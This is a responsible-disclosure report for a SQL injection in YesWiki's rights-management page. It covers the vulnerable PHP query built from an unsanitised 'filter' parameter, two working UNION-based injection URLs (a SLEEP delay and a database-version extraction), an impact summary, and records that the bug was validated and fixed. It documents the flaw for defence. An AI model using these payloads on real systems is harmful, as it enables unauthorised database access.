SQL Injection in yeswiki/yeswiki

Valid

Reported on

Oct 5th 2021


Description

A SQL injection attack consists of insertion or 'injection' of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. https://github.com/YesWiki/yeswiki/ is vulnerable to SQL Injection as shown below:

Proof of concept

Vuln variable: $_GET['filter']
Snippet:

        $filter = $_GET['filter'] ?? null;
        ...
            $search = ' AND body LIKE \'%"id_typeannonce":"' . $filter . '"%\'';
            ...
    $liste_pages = $this->Query('SELECT * FROM '.$table."pages WHERE latest='Y' ".($search ?? '')."ORDER BY "
        .$table.'pages.tag ASC');

Payload

Login as an admin in yeswiki Go to http://localhost/yeswiki-doryphore/?GererDroits
Set the payload

http://localhost/yeswiki-doryphore/?GererDroits&filter=X%22%25%27%20UNION%20SELECT%20SLEEP(9),null,null,null,null,null,null,null,null,null%20--%20-v%20

This is a union based sql injection , in the previous payload an sleep is injected to delay the server responses.
However this could be used to extract DB information
For example to extract the DB version perform the following request.

http://localhost/yeswiki-doryphore/?GererDroits&filter=X%22%25%27%20UNION%20SELECT%20null,@@version,null,null,null,null,null,null,null,null%20--%20-v%20

Impact

Injection can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, or denial of access. Injection can sometimes lead to complete host takeover.

We have contacted a member of the yeswiki team and are waiting to hear back 2 months ago
Jérémy Dufraisse validated this vulnerability 2 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jérémy Dufraisse confirmed that a fix has been merged on 11be00 2 months ago
Jérémy Dufraisse has been awarded the fix bounty
gererdroits.php#L111 has been validated